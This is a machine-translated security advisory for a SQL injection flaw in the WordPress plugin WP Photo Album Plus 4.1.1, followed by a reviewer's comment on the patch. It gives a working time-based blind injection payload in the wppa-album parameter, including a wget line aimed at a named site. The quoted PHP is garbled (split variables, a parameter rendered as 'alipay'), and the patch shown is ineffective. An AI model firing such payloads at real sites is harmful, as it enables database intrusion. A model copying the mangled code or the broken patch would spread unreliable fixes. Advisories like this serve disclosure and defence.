Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
Author: Skraps (jackie. craig. sparks (at) live.com www.2cto.com jackie. craig. sparks (at) gmail.com @ skraps_foo)
Plug-in address: http://wordpress.org/extend/plugins/wp-photo-album-plus/
Download: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
Affected Version: 4.1.1 (tested)
---------------
PoC (POST data)
---------------
Http://www.bkjia.com/wordpress /? Page_id = 7 & wppa-album = 1 AND 1 = IF (2> 1, BENCHMARK (500000000, MD5 (CHAR (115,113,108,109, 97,112), 0) & wppa-cover = 0 & wppa-occur = 1
Wppa-album = 1 AND 1 = IF (2> 1, BENCHMARK (500000000, MD5 (CHAR (115,113,108,109, 97,112), 0) & wppa-cover = 0 & wppa-occur = 1
Example:
Wget http://www.bkjia.com/wordpress /? Page_id = 7 & wppa-album = 1 AND 1 = IF (2> 1, BENCHMARK (500000000, MD5 (CHAR (115,113,108,109, 97,112), 0) & wppa-cover = 0 & wppa-occur = 1
---------------
Vulnerable code
---------------
Line 490 of wppa-functions.php:
// Album selection: when the occurrence counters match and an album parameter
// is present, the album id and the cover flag are copied straight from the
// query string (wppa_get_get hands back the raw $_GET value). Nothing in this
// block validates $id before it is used in the queries further down.
If ($ occur ==$ ref_occur) & wppa_get_get ('album ')){
$ Id = wppa_get_get ('alipay '); // presumably the 'album' parameter -- the listing is machine-translated, confirm against the plugin source
$ Wppa ['is _ cover'] = wppa_get_get ('cover ');
}
...
...
If (is_numeric ($ id )){
If ($ wppa ['is _ cover']) $ q = $ wpdb-> prepare ('select * from '. WPPA_ALBUMS. 'where' id' = % s', $ id );
Else $ q = $ wpdb-> prepare ('select * FROM '. WPPA_ALBUMS. 'Where 'A _ parent' = % s'. wppa_get_album_order (), $ id );
$ Albums = $ wpdb-> get_results ($ q, 'array _ ');
Line 3170 of wppa-functions.php:
/**
 * Returns a request parameter taken straight from $_GET.
 *
 * The prefixed key ('vpa-' . $index as printed in this listing -- the page
 * is machine-translated, so check the real prefix in the plugin source) is
 * looked up first, then the bare key; $default is returned when neither is
 * set. The value is returned unmodified, so every caller receives untrusted
 * input and must validate it (cast or allow-list) before using it in a
 * query or in output.
 *
 * @param string $index   parameter name without the prefix
 * @param mixed  $default value returned when the parameter is absent
 * @return mixed raw $_GET value, or $default
 */
Function wppa_get_get ($ index, $ default = false ){
If (isset ($ _ GET ['vpa-'. $ index]) {// New syntax first: the prefixed name wins
Return $ _ GET ['vpa-'. $ index];
}
If (isset ($ _ GET [$ index]) {// Old syntax: bare parameter name
Return $ _ GET [$ index];
}
Return $ default; // neither form present
}
---------------
Patch
---------------
* **./Wppa-functions.php 19:15:11. 574775456-0400
---./Wppa-functions.php.new 19:13:14. 735784321-0400
***************
* ** 506,513 ****
// Top-level album has no cover
If ($ id = '0') $ wppa ['is _ cover'] = '0 ';
-
// Do the query
If (is_numeric ($ id )){
If ($ wppa ['is _ cover']) $ q = $ wpdb-> prepare ('select * from '. WPPA_ALBUMS. 'where' id' = % s', $ id );
Else $ q = $ wpdb-> prepare ('select * FROM '. WPPA_ALBUMS. 'Where 'A _ parent' = % s'. wppa_get_album_order (), $ id );
--- 506,513 ----
// Top-level album has no cover
If ($ id = '0') $ wppa ['is _ cover'] = '0 ';
// Do the query
+ $ Id = substr ($ id, 3 );
If (is_numeric ($ id )){
If ($ wppa ['is _ cover']) $ q = $ wpdb-> prepare ('select * from '. WPPA_ALBUMS. 'where' id' = % s', $ id );
Else $ q = $ wpdb-> prepare ('select * FROM '. WPPA_ALBUMS. 'Where 'A _ parent' = % s'. wppa_get_album_order (), $ id );
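Review bot: The added `$id = substr($id, 3);` on the new side is not an input check: it discards the first three characters of whatever the album parameter carried and hands the remainder to the existing `is_numeric()` test and the two queries, so a legitimate one- or two-digit album id becomes an empty string while a longer unexpected value is passed on with only its prefix removed. The robust fix is to coerce the value to an integer where it is consumed and bind it with the integer placeholder, i.e. replace the `substr` line with `$id = (int) $id;` and use `%d` instead of `%s` in both `$wpdb->prepare()` calls; `is_numeric()` on its own also accepts forms such as `1e3` and leading whitespace, so it is a weaker guard than a cast. Two lines above, `if ($id = '0')` reads as an assignment rather than a comparison, but the listing is machine-translated (capitalised keywords, `$ id`), so the exact tokens should be checked against the plugin source. The enclosing function starts and ends outside the hunk.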
***************
* ** 3384,3387 ****
Global $ wppa;
If ($ wppa ['any']) echo $ wppa ['searchresults'];
! }
\ No newline at end of file
--- 3384,3387 ----
Global $ wppa;
If ($ wppa ['any']) echo $ wppa ['searchresults'];
! }